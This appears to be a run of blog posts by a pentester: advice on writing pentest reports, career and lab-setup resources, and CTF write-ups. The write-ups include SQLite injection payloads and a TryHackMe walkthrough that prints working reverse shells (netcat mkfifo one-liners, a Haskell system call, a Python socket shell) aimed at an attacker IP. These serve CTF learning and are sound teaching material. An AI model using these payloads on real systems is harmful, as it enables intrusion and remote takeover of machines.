A few month ago i passed the eWPT exam. That is when i realized that doing a pentest report could be hard for people who just broke in to the industry.
This article will try to give some simple steps on how to write a pentest report and important elements that should be in it. It aims to give professionals new to the field some advices on how to write a report for exams or for customers. It can also be used by bug hunters (the vulnerability report part).
This article is small on purpose, i want it to be clear but not too tenuous to read as the process of writing a report can seem scary to newcomers.
Why do we need a report?
A report is the document that will present all your findings and explain to every role of the company you’ve been hired by for the mandate. It will contain the scope previously defined with your customer, high level explainations of the findings and their impact as well as precise technical descriptions of every finding. There are different parts in a report.
The Executive Summary
This is the part where you need to explain for the executive of the company who will read the report. It needs to be high level explainations with no technical details.
It is relevant to add graphs of the findings such as: Vulnerabilities by impact, Attacks by type and Vulnerabilities by cause.
The definitions on Mitre CWE can help you for defining the categories to use in those graphs.
It can comport a global posture on how the findings and attack combinaison could impact your customer’s business.
It can be also useful to include a remediation priority based on your expertise and the prior discussions you had with your customer.
The Vulnerability Report
This is the part where you present each vulnerability you found. I recommend that you order those by severity.
Each vulnerability should have a score that you can calculate using CVSS scores. Here is a calculator. This score takes in account precise metrics to generate a score as close as possible to the impact the vulnerability could have. However, depending on the context of your customer the impact might not be the same, this will be your expertise and the prior conversation that you had with your customer about their business that will help you define the impact for your customer. You don’t need to tamper the CVSS metrics, this is the goal of the remediation priority i mentioned in the previous part.
Here is a way to present it:
- CVSS score
- Affected item
- Description: you have to explain the vulnerability and explain it in the context of your target. For example: « In the context of the support page, some checks were made on the client side, but those checks could be bypassed. »
Feel free to add resources about the vulnerability
- Remediation: Here you have to explain how to mitigate the vulnerability. It is always good to add resources from recognized industry standards like OWASP for web pentesting reports.
- Evidence: Here you need to add proof of the vulnerability. The goal is that the team that will implement the mitigation is able to reproduce the attack. That is why it is important that during the attacking phase you write plenty of notes and take plenty of screens and proofs.
Note: I personaly prefer when each vulnerabilty is presented with the remediation but you can also write a remediation report part right after this.
Here is a great template done by Andrew Morrison (docx and odt):
- Pentext is a collection of XML templates, XML schemas and XSLT code, which combined provide an easy way to generate IT security documents including test reports
- Pentest standards about reporting
- Radically Open Security provides in their portfolio some reports of project they did. Thoses are good examples.
- MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations.
- CWE is a community-developed list of software and hardware weakness types. It serves as a common language, a measuring stick for security tools, and as a baseline for weakness identification, mitigation, and prevention efforts.
- OWASP list of vulnerabilities (for web pentesting)
- Exploit db is a great resource for exploitation
- National Vulnerability Database by the US CERT
Setting up the attacking machine
Access a browser and use Burp or a proxy
I wanted to explain set up details because i really think it is useful for any one who would like to play CTF and access a browser when the connexion to the attacking machine is made through ssh.
So this introduction aims to be userful for any CTF or even daily practice at you job.
You will have to use -D et -C while launching the command
sudo ssh -C -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 4444
-D specify the local port you wish to use for forwarding
-C is the Compression
-i to specify the location of the key file
Then we need to set up burp under the User options tab (it can also be made under Project options, it depends if you wish to keep permanently or just for a specific project).
Then you can configure your browser proxy as it is usually done when you use Burpsuite (note: this picture is of foxyproxy a firefox add on that i would recommend to anyone who happens to work often on webpentest):
For this CTF my team mate CptButtStuff was using proxychains which is an amazing tool to launch a local program.
Here is how to set it up:
Open a new tab and run ssh again as follow using another port than the one you used for burp:
sudo ssh -i metasploit_ctf_kali_ssh_key.pem kali@<REMOTE-IP> -D 5555
Edit the proxychains conf file /etc/proxychains.conf:
socks5 127.0.0.1 5555
And then you can launch a program you wish using proxychains (here i am using nmap):
proxychains nmap <IP-ADDRESS>
Cool! But how can i get file from the remote host to my local machine?
You can use scp as follow:
scp -i private_key.pem username@remote:/path/to/file /local/dir
Now that we have a set up ready (and not only for this chal 😀 ) we can work on 2 of spades
On port 9001 the service was http (see below the extract of my nmap scan)
9001/tcp open http Thin httpd
When we browse to this page we get a form:
One of the first thing that comes in mind with a form is sql injection so i tried this, and got a nice error disclosing plenty of info:
' Union select 1, 2 --
This basically means that we need to try to add another col
And there we go:
Now that we know that the backend DB is sqlite let’s find cool payloads to dump the database:
|Table name enumeration||SELECT name FROM sqlite_master WHERE type=’table’|
|Table schema enumeration||SELECT sql FROM sqlite_master WHERE type=’table’|
I used this one and got the schema of the table
' Union SELECT null, null, sql FROM sqlite_master WHERE type='table' --
The first line is exactly the one we need so now we can query the information we need to get the flag:
' Union SELECT 1, flag, link from hidden --
And there we have our flag we just need to wget our png file and md5sum it to get the flag:
It has always been difficult for me to get a concrete idea of a job. Especially in the changing world in which we live.
In the 21st century, the importance of transversal skills as meta-skills is becoming apparent. In other words, in the world of cybersecurity, a job may contain different skills needed to be effective in its practice. In cyber professions, whether technical or non-technical, learning how to learn becomes essential to adapt to a rapidly changing environment.
This demand for flexibility encourages observation, evaluation and analysis, while sharing with your peers resources, expertise and vision for protecting citizens’ data and their way of life.
Living in the 21st century disrupts traditional learning through continuous learning, but how to transform information into knowledge?
In this article I will try to answer the questions: What are the different areas of cybersecurity? What skills are needed to work in cybersecurity? What careers are there?
The different areas in Cybersecurity
The careers in Cybersecurity
- Cyber career pathway tool by US National Initiative for Cybersecurity Careers and Studies
- Cyber seek’s career pathway
Which skill for which career?
About degrees and salaries
- Cybersecurity Jobs: Overview by Cyber Degrees
- No Career Ladders For Cybersecurity Professionals? by Cybersecurity Ventures
Cybersecurity being a young field, degrees are not the only rule to get a job, the experience and motivation of the candidate remains what will make the difference for an employer. You can train yourself, pass certifications, engage with cyber security organizations to demonstrate this motivation.
When people ask me about how to get into pentesting, the first i say is that practice is essential. But how to practice pentesting on your own? How to get started with virtual machines?
In this article i am going to explain, how to create a virtual attacking machine. With this machine, you will be able to practice on platforms that have « boxes ». Boxes are vulnerable machines that can be hacked. I will then present some of the website you can use for practice.
Practicing this way is very helpful because it is the closest way to understand pentest (it is not realistic but you will get the core techniques used for pentest)
How to get started ?
Create your virtual attacking machine with Kali Linux
- Download Virtualbox and install it: https://www.virtualbox.org/
- Download Virtualbox and install it from here
- Download the lastest kali linux virtualbox image (it is going to be our attacker machine) Make sure to take the virtualbox image and not the vmware one:
- Install Kali:
- Go to virtualbox and click on « File » > « Import Appliance… »
- Click on the yellow folder and navigate to the image of kali you downloaded, select it and click on open
- Click on next and then click on import. It will take a little while… And then launch it for the first time. Username should be kali and password kali but you can find this info on their website or on the description of your machine in virtualbox
What website can you use?
Some great starters
First i would recommend to create an account on tryHackMe here, it’s free! Then you will have to download your configuration file and access to the VPN so you can start hacking away on their machines.
What is awesome about tryhackme is that you even have box to learn how to get started on their platform here. This other box will tell you everything about OpenVPN and how to access the boxes. So it will not only be useful on tryhackme but also on other platforms and in your daily practice as a pentester (we do sometimes need a VPN to access our customer system to test).
If you are not familiar with VPN here is a wikipedia article explaining what it is. But simply put you can see a VPN as a tool that will give you access to another computer or environment remotely. TryHackMe and other website for pentesting practice will require a VPN so that you can access your practicing environment, usually a vulnerable machine hack.
If you are not familiar with linux, TryHackMe has a box that explains it very well, you even get a cool badge by completing it! You can also practice on overthewire.org, this website is a wargame you will be able to learn about linux and security concepts. If you want a little more explainations on concepts you should definitely go on linuxjourney.
After this you can have a look at the box on TryHackMe that introduces you to pentesting: basic pentesting.
Here is a list of great box (all free) on tryhackmefor beginners:
- Learn Nmap
- Learn the web fundamentals
- Learn about active recon, web app attacks and privilege escalation on Vulniversity
- Learn how to research efficiently on search engines
- Get familiar with Metasploit
- Learn about Google Dorking
- A fun way to learn the basics of pentesting in a christmas theme
- Walkthrough on exploiting a Linux machine with Kenobi
- A crash course on various topics in penetration testing
There are plenty more i really recommend you to have a look around.
Push your skills further with other platforms
You have covered your beginners skills? You want to go further? Here are some useful resources for this.
- Get your OSCP certification with Rana Kalil’s gitbook and Hackthebox
- Join CTF platforms: root-me, ringzer0, find lots of other CTF platforms in my resources article here in the section learning by doing.
- Hack lots of box that you deploy on virtualbox with vulnhub.
- Get into bug bounty with hackerone, bugcrowd, (find other bug bounty platform in my resources).
- Do not stay alone in your practice: Join groups like Hackthebox Ottawa, OWASP chapters, (ISC)2 Toronto chapter, CSNP and so many others you can find ones near you with meetup.com.
Today i am going to present the write up for HaskHell on TryHackMe.
First of all after having deployed the machine, we can run nmap on the targeted IP.
nmap -p- -sV 10.10.54.105
Result of Nmap:
kali@kali:~$ nmap -p- -sV 10.10.54.105 -T4 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-11 11:40 EDT Nmap scan report for 10.10.54.105 Host is up (0.23s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 5001/tcp open http Gunicorn 19.7.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1183.25 seconds
We can see that port 5001 is http and open.
Let’s have a look at Port 5001
Go to http://<target-ip>:5001
If you click on « homework here » you will find a page with an exercise
The link to submit exercise respond with a 404.
Also the following screen shows us that this teacher has already had hacker’s student
This also gives us a huge hint: We can submit a haskell script and it will be interpreted. So let’s try to make a reverse shell.
But first let’s try to execute a command. Here is the documentation to execute a command with haskell: System Process on haskell
Also we need to find where to upload our script, let’s run dirb
Okay, now that we know where to put our script. Let’s write it!
Reverse shell with Haskell
I did not know anything about haskell so after some digging i found out that i had to save my script with .hs in the end for it to be recognized and executed by our target.
Also the text in homework1 specifies: « Your file will be compiled and ran and all output will be piped to a file under the uploads directory. »
This means that we will be able to see our output and errors in order to debug our script if we need (which was really helpful for me)
First i tried a simple ls
#!/bin/env runhaskell import System.Process main :: IO () main = do let stdin' = "" (errCode, stdout', stderr') <- readProcessWithExitCode "ls" ["-lar"] stdin' putStrLn $ "stdout: " ++ stdout' putStrLn $ "stderr: " ++ stderr' putStrLn $ "errCode: " ++ show errCode
And i got this:
On pentestmonkey.net we find the following command:
nc -e /bin/sh 10.0.0.1 1234
So i tried a netcat with the -e option to specify what to do after the nc.
However, there were 2 errors on my case my port 1234 was busy and the netcat command on the target did not handle -e option. Resolving the first error is easy (changed my port to 8888) but not the second one 🙂
So the script that worked for me was the following one:
module Main where import System.Process main = system "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 8888>/tmp/f"
Indeed according to this website, the following command would be handled on the other netcat versions:
#other version of netcat rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 8888 >/tmp/f
Do not forget before uploading the script to launch you listener on your attacking machine
nc -lvp 8888
And then we get a shell:
And we can get the user flag:
$ ls __pycache__ user.txt $ cat user.txt
Now that we got user we need to get root. But first let’s find to way to avoid having to connect through our webshell. Let’s try to use ssh. If we navigate to the user .ssh folder we have a key pair.
Let’s try to get those on our attacker machine by running python simple http server.
Then from the attacking machine we can connect through ssh after having set up the proper permission for our private key (700)
To have an interactive shell we can run this:
python -c 'import pty; pty.spawn("/bin/bash")'
And there we go:
Linux enumeration with linepeas:
Let’s upload linepeas in our target machine.
On our kali we run
And then we launch python simple server to put it on the target
And from our target we get it with:
$ wget http://10.2.28.215:8000/linpeas.sh$ chmod 755 linepeas.sh$ ./linpeas.sh
Linepeas is very good but for this context we could have done a sudo -l before and this would have been it. It is a good habit to try this before doing anything else.
Here is what we get if we run flask:
Well it is something very useful. We know that we need to write a script and launch it as root. In my case i did a reverse shell but it can be even easier to just launch a shell with a python command.
Here is the reverse shell i did with a script:
#!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("your-ip",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
We then just have to set up a new listener on our attacker machine:
nc -lvp 8888
Se export our script to our env (target machine)
And we run our script as root from the target machine:
We get a shell from our attacking machine. So let’s run our command to get an interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
We now have the root flag:
CyberSecurity NonProfit (CSNP) is a 501(c)(3) nonprofit organization that provides free security education and resources to make cybersecurity more accessible, inclusive, and diverse.
I was invited to talk and i discussed what pentesters do, what skills are needed, and how to start a career in pentesting. I also demonstrated web application exploits such as SQL injection and cross-site scripting (XSS).
Masarah Paquet-Clouston est chercheuse en sécurité chez GoSecure, doctorante en criminologie à l’Université Simon Fraser et collaboratrice du projet Stratosphere IPS à Prague. Elle mène des recherches dans le domaine de la cybercriminalité. Durant les dernières années, ses recherches ont portées sur les botnets, le traçage des bitcoin, le trafic de drogue en ligne et le crime organisé. En 2016, Masarah a gagné le prix Mitacs pour sa recherche sur les « faux j’aime ».
Aujourd’hui, elle nous parle de son parcours, de ses recherches et de ses implications pour accroître la visibilité des femmes dans le domaine de la cybersécurité.
Lisandre Cadotte est pentesteuse chez Vidéotron, une firme de télécommunication québécoise. Elle a plus de six ans d’expérience dans le domaine de la cybersécurité.
Elle participe souvent à des CTF et propose des write ups sur son site ainsi qu’une grande quantité de ressources utiles aux penteste.use.r.s. Elle est également passionnée de musique.
Dans cet épisode, Lisandre nous parle de son parcours, son métier, ainsi que de sa vision de la cybersécurité.